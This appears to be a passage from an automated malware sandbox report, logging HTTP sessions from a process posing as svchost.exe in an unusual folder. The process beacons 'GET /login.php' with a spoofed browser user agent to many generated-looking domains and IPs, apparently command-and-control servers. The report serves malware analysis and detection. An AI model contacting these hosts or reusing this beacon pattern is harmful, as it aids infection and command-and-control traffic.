                                                                                                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 57 5a 2f 34 65 4e 63 63 38 6f 6e 38 6a 6c 43 70 6a 31 65 47 57 57 75 4b 39 58 73 75 74 4c 6e 74 70 41 64 6a 48 44 33 46 5a 37 73 6f 75 6b 6c 30 4f 4b 75 6b 56 42 53 6e 6a 51 39 65 6b 4c 36 4e 55 2f 48 34 46 52 43 68 6e 49 4c 73 69 71 4d 56 5a 6c 53 56 58 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_WZ/4eNcc8on8jlCpj1eGWWuK9XsutLntpAdjHD3FZ7soukl0OKukVBSnjQ9ekL6NU/H4FRChnILsiqMVZlSVXg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.072458029 CET656INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                          Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTU1NzJjMjUtNjAzMi00NjdiLWIwMTUtMTA1NzVjNGU0ZWE1IiwicGFnZV90aW1lIjoxNzMxMzQ1ODc4LCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          43192.168.2.86483072.52.179.174801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.420017958 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyhub.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          44192.168.2.84931272.52.179.174801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.951400042 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyhub.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                          45192.168.2.862047199.191.50.8380
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.315481901 CET281OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: galyqaz.com
                                                                                                                                                                                                          Cookie: vsid=904vr478891445443024397


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          46192.168.2.853519208.100.26.245801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.916307926 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyvyxor.com
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.360356092 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:54 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.363251925 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyvyxor.com
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.576749086 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:54 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          47192.168.2.85352085.17.31.82801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.917817116 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyfus.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          48192.168.2.853521199.59.243.227801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.926698923 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vojyqem.com
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.352050066 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:25:53 GMT
                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                          content-length: 1094
                                                                                                                                                                                                          x-request-id: 3581daf9-42cf-4c3e-921a-5d98ff1008f3
                                                                                                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                          set-cookie: parking_session=3581daf9-42cf-4c3e-921a-5d98ff1008f3; expires=Mon, 11 Nov 2024 17:40:54 GMT; path=/
                                                                                                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.352089882 CET212INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                          Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzU4MWRhZjktNDJjZi00YzNlLTkyMWEtNWQ5OGZmMTAwOGYzIiwicGFnZV90aW1lIj
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.352099895 CET316INData Raw: 6f 78 4e 7a 4d 78 4d 7a 51 31 4f 54 55 30 4c 43 4a 77 59 57 64 6c 58 33 56 79 62 43 49 36 49 6d 68 30 64 48 41 36 4c 79 39 32 62 32 70 35 63 57 56 74 4c 6d 4e 76 62 53 39 73 62 32 64 70 62 69 35 77 61 48 41 69 4c 43 4a 77 59 57 64 6c 58 32 31 6c
                                                                                                                                                                                                          Data Ascii: oxNzMxMzQ1OTU0LCJwYWdlX3VybCI6Imh0dHA6Ly92b2p5cWVtLmNvbS9sb2dpbi5waHAiLCJwYWdlX21ldGhvZCI6IkdFVCIsInBhZ2VfcmVxdWVzdCI6e30sInBhZ2VfaGVhZGVycyI6eyJyZWZlcmVyIjpbImh0dHA6Ly93d3cuZ29vZ2xlLmNvbSJdfSwiaG9zdCI6InZvanlxZW0uY29tIiwiaXAiOiI2Ni4yMy4yMDYuM


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          49192.168.2.85352223.253.46.64801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.927016973 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.378228903 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Server: Microsoft-IIS/7.5
                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:48 GMT
                                                                                                                                                                                                          Content-Length: 1245
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.378249884 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                          Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                          50192.168.2.853523154.212.231.8280
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.938534975 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.823400021 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:54 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.824806929 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
                                                                                                                                                                                                          Nov 11, 2024 18:25:55.202531099 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:55 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          51192.168.2.853524188.114.96.3801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.948034048 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Nov 11, 2024 18:25:55.335649014 CET972INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:55 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
